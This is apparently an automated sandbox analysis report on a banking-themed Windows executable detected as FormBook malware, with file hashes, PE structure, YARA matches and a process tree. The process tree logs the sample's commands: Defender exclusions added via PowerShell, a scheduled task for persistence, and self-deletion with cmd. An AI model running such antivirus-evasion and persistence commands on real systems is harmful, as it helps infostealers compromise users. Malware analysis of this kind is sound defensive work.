              Preview: .**********************..Windows PowerShell transcript start..Start time: 20211125184857..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 921702 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe..Process ID: 5828..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211125184857..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe..**********************..Windows PowerShell transcript start..Start time: 20211125185336..Username: computer\user..RunAs User:

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Entropy (8bit):7.8432109795537235
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              • Win32 Executable (generic) a (10002005/4) 49.78%
              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              File name:HSBC_SWIFT-20-11-2021.exe
              File size:438272
              MD5:3e9bddcd8ede94beb73d43d4d3446fe7
              SHA1:27723f2fb360a300df95c22fd1d8353a5d940455
              SHA256:4518c17e858eaae9a38cdf5953bd7d0cad3c3fd5fa2b9a5b84e0cad5e8ecfc5e
              SHA512:81ffd8d361c6809e41819f9074e7ee84e8e8ed4bd744d8c87270e26ca405bf613ea9c29247c71ed50e057b5f39bb05cbbacd78433a37426ba02efa7063366dab
              SSDEEP:12288:lH41U0XdLgxmfz9aWuIazPy03IYwr3EQZpdoyWQHzKQMixBFm:lHYU0uEr9aWTyNBwjppd1WQTAi1
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5G.a..............0.............j.... ........@.. ....................... ............@................................

              File Icon

              Icon Hash:00828e8e8686b000

              Static PE Info

              General

              Entrypoint:0x46c56a
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0x619F4735 [Thu Nov 25 08:20:05 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:v4.0.30319
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

              Entrypoint Preview

              Instruction
              jmp dword ptr [00402000h]
              add byte ptr [eax], al
              add byte ptr [ebp+0800000Eh], ch
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x6c5180x4f.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x6e0000x5f4.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x700000xc.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x20000x6a5800x6a600False0.881970200499data7.85580215694IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rsrc0x6e0000x5f40x600False0.440104166667data4.21799031052IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x700000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              RT_VERSION0x6e0900x364data
              RT_MANIFEST0x6e4040x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

              Imports

              DLLImport
              mscoree.dll_CorExeMain

              Version Infos

              DescriptionData
              Translation0x0000 0x04b0
              LegalCopyrightCopyright Rogers Peet
              Assembly Version8.0.6.0
              InternalNameUnmanagedMemoryAccess.exe
              FileVersion5.6.0.0
              CompanyNameRogers Peet
              LegalTrademarks
              Comments
              ProductNameBiblan
              ProductVersion5.6.0.0
              FileDescriptionBiblan
              OriginalFilenameUnmanagedMemoryAccess.exe

              Network Behavior

              No network behavior found

              Code Manipulations

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              Analysis Process: HSBC_SWIFT-20-11-2021.exe PID: 7156 Parent PID: 6088

              General

              Start time:18:48:48
              Start date:25/11/2021
              Path:C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"
              Imagebase:0xc00000
              File size:438272 bytes
              MD5 hash:3E9BDDCD8EDE94BEB73D43D4D3446FE7
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.384521083.000000000314D000.00000004.00000001.sdmp, Author: Joe Security
              Reputation:low

              Chronological Activities

              Analysis Process: powershell.exe PID: 5828 Parent PID: 7156

              General

              Start time:18:48:54
              Start date:25/11/2021
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
              Imagebase:0xd30000
              File size:430592 bytes
              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:high

              Chronological Activities

              Analysis Process: conhost.exe PID: 4708 Parent PID: 5828

              General

              Start time:18:48:55
              Start date:25/11/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff61de10000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: powershell.exe PID: 5576 Parent PID: 7156

              General

              Start time:18:48:55
              Start date:25/11/2021
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe
              Imagebase:0xd30000
              File size:430592 bytes
              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:high

              Chronological Activities

              Analysis Process: conhost.exe PID: 4532 Parent PID: 5576

              General

              Start time:18:48:56
              Start date:25/11/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff61de10000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: schtasks.exe PID: 4528 Parent PID: 7156

              General

              Start time:18:48:56
              Start date:25/11/2021
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp
              Imagebase:0x9d0000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: conhost.exe PID: 6496 Parent PID: 4528

              General

              Start time:18:48:59
              Start date:25/11/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff61de10000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: HSBC_SWIFT-20-11-2021.exe PID: 6020 Parent PID: 7156

              General

              Start time:18:49:01
              Start date:25/11/2021
              Path:C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
              Imagebase:0xea0000
              File size:438272 bytes
              MD5 hash:3E9BDDCD8EDE94BEB73D43D4D3446FE7
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low

              Chronological Activities

              Analysis Process: explorer.exe PID: 3440 Parent PID: 6020

              General

              Start time:18:49:08
              Start date:25/11/2021
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Explorer.EXE
              Imagebase:0x7ff6f22f0000
              File size:3933184 bytes
              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:high

              Chronological Activities

              Analysis Process: msdt.exe PID: 1972 Parent PID: 3440

              General

              Start time:18:49:47
              Start date:25/11/2021
              Path:C:\Windows\SysWOW64\msdt.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\msdt.exe
              Imagebase:0xf60000
              File size:1508352 bytes
              MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:moderate

              Chronological Activities

              Analysis Process: cmd.exe PID: 5868 Parent PID: 1972

              General

              Start time:18:49:52
              Start date:25/11/2021
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:/c del "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"
              Imagebase:0x2a0000
              File size:232960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Chronological Activities

              Analysis Process: conhost.exe PID: 3184 Parent PID: 5868

              General

              Start time:18:49:53
              Start date:25/11/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff61de10000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Chronological Activities

              Analysis Process: explorer.exe PID: 3120 Parent PID: 568

              General

              Start time:18:50:15
              Start date:25/11/2021
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:explorer.exe
              Imagebase:0x7ff6f22f0000
              File size:3933184 bytes
              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Chronological Activities

              Disassembly

              Code Analysis

              Reset < >

                Analysis Process: HSBC_SWIFT-20-11-2021.exe PID: 7156 Parent PID: 6088 HSBC_SWIFT-20-11-2021.exeCOMMON

                Executed Functions

                Function 0172D2E8, Relevance: 5.0, Strings: 3, Instructions: 1300COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.383904029.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false
                Similarity
                • API ID:
                • String ID: 48l$48l$d
                • API String ID: 0-4238415151
                • Opcode ID: 682e83db24d08eaacf78103a37980fd34e25c7e5aeffbc42fd79dee631569122
                • Instruction ID: 48752d60943dfb829d09bd15775b50f330cfd7b2f813ebab170f4d96eaf63280
                • Opcode Fuzzy Hash: 682e83db24d08eaacf78103a37980fd34e25c7e5aeffbc42fd79dee631569122
                • Instruction Fuzzy Hash: 3DC23B38B01219CFDB68DF64D459A99BBB2FB89304F1184A9D90A9B365DF30DD82CF50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01728250, Relevance: .5, Instructions: 517COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.383904029.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1c5c4705c0d0399e4ac8547ab494845fad9dfe473f66193ad0074016e70a4e8c
                • Instruction ID: 6b768bca7d33ec4f827713e11f3264da540451fc94d4816160df15cc57dcb7d7
                • Opcode Fuzzy Hash: 1c5c4705c0d0399e4ac8547ab494845fad9dfe473f66193ad0074016e70a4e8c
                • Instruction Fuzzy Hash: B7020331A00235CFDF25DF69C4542BEFBE2AF44304F158869E8169B396DB36D8468B93
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05789072, Relevance: .3, Instructions: 343COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 10ee9eb38538b8fedd3cb2d5e507393419ae29c71ae9ddde35ded6fb0d685849
                • Instruction ID: 1154f0748f346db891a83ff6af95ab415f57bf16ef3c5df9a75ea68b5a06815f
                • Opcode Fuzzy Hash: 10ee9eb38538b8fedd3cb2d5e507393419ae29c71ae9ddde35ded6fb0d685849
                • Instruction Fuzzy Hash: 16D1D130B88255CBCB01EB69C854ABEFBB2FF44304F148266E655DB2D2D334E841EB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0578F190, Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID: Xcl$Xcl$Xcl$Xcl
                • API String ID: 0-3823498771
                • Opcode ID: b1581f3a69c9bd691eb9bb12662dc502d3b2821fd77fc94a3f3a1c5f4cec2f73
                • Instruction ID: 94417e1fd0e322543eb86b3f4c1f8f70518b64676ed42a0b5ca00ef54c21a361
                • Opcode Fuzzy Hash: b1581f3a69c9bd691eb9bb12662dc502d3b2821fd77fc94a3f3a1c5f4cec2f73
                • Instruction Fuzzy Hash: 8F616A35B501148FCB14EFA9D854ABD7BB6FF89714F144469E902AB3A0CB31DC15EBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05784EAB, Relevance: 2.6, Strings: 2, Instructions: 67COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID: $%l$$%l
                • API String ID: 0-4074844668
                • Opcode ID: e1f4980060baa86896b7333d93b15289e7125f50edb4df9b12da1b0df571f26c
                • Instruction ID: 8101e782eb9e7cff642f3b88e22dddccd466ac8dd6d8b5daf9f360b4f6b3cf87
                • Opcode Fuzzy Hash: e1f4980060baa86896b7333d93b15289e7125f50edb4df9b12da1b0df571f26c
                • Instruction Fuzzy Hash: 3821C3757006058FCB14EBA8D4199EEB7F6EF94208B45882DD506DB750EF74ED088BA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01724747, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                Download Yara Rule
                APIs
                • RtlEncodePointer.NTDLL(00000000), ref: 017247CD
                Memory Dump Source
                • Source File: 00000000.00000002.383904029.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false
                Similarity
                • API ID: EncodePointer
                • String ID:
                • API String ID: 2118026453-0
                • Opcode ID: 0812e0184250a3349468e1ad092a2b01c61661d1c104b5aff5bd4de0235146f5
                • Instruction ID: 740d8d9a77808a782be0f037a163bef33531ac0de7e4f11bbc53ce8dfaeb1213
                • Opcode Fuzzy Hash: 0812e0184250a3349468e1ad092a2b01c61661d1c104b5aff5bd4de0235146f5
                • Instruction Fuzzy Hash: 5521ACB9810365CFDB10DFAAD50939ABFF8EB09314F10842AD41AE7782CB799505CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01724497, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                Download Yara Rule
                APIs
                • RtlEncodePointer.NTDLL(00000000), ref: 01724522
                Memory Dump Source
                • Source File: 00000000.00000002.383904029.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false
                Similarity
                • API ID: EncodePointer
                • String ID:
                • API String ID: 2118026453-0
                • Opcode ID: f8dcf74b6923ed42911b803179f55aaf7ab845715f0b86c3079e2432ffefde48
                • Instruction ID: 0cfe768ff33654a6bc379c16cef2f13f73ee720f9e0bf73d0432d58483a9f6c1
                • Opcode Fuzzy Hash: f8dcf74b6923ed42911b803179f55aaf7ab845715f0b86c3079e2432ffefde48
                • Instruction Fuzzy Hash: 5F2156B59003458FDF50DFAAD94939EBFF4EB48318F208829E846A7641DB79A504CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 017244A8, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                Download Yara Rule
                APIs
                • RtlEncodePointer.NTDLL(00000000), ref: 01724522
                Memory Dump Source
                • Source File: 00000000.00000002.383904029.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false
                Similarity
                • API ID: EncodePointer
                • String ID:
                • API String ID: 2118026453-0
                • Opcode ID: 7245ff225fda93bf90c893d388c9a5837dee3c25f2b2fc4402d5cc227384a9fb
                • Instruction ID: 0f458d108a940d7dd9e8a95606f8f78f16eaf69ed76d294dc3233d63f3f34ae7
                • Opcode Fuzzy Hash: 7245ff225fda93bf90c893d388c9a5837dee3c25f2b2fc4402d5cc227384a9fb
                • Instruction Fuzzy Hash: BF115674A00255CFDF50DFAAD94879EBFF4EB48314F208829D806A7641CB79A545CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05787E87, Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID: $,l
                • API String ID: 0-2092904771
                • Opcode ID: 3af91d9470c5a65d9129836d673deb0810bfe8733d36373b60df45da9889786c
                • Instruction ID: 7ba63af2e14e3afc8e48af508e7288a21ed62ab0548175fef89cbe3e49f927e6
                • Opcode Fuzzy Hash: 3af91d9470c5a65d9129836d673deb0810bfe8733d36373b60df45da9889786c
                • Instruction Fuzzy Hash: 7781F270B502158FCB18EBA4C8596BE7BB6FF85304F24886DD0069F396DB31CC459BA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05787C30, Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID: $,l
                • API String ID: 0-2092904771
                • Opcode ID: 82a032917a997f7bb3de743430c6101ec42b9b9eefdc269e25190ee30cc64f84
                • Instruction ID: 4fcdfa8a70aca472544a524db970428f58865796c9e5e0f2c0b9cbce6b22377f
                • Opcode Fuzzy Hash: 82a032917a997f7bb3de743430c6101ec42b9b9eefdc269e25190ee30cc64f84
                • Instruction Fuzzy Hash: C651E131B801249FD718AB78C84477EBAA6EF89314F248438D90ADB794DF36DC0197A1
                Uniqueness

                Uniqueness Score: -1.00%

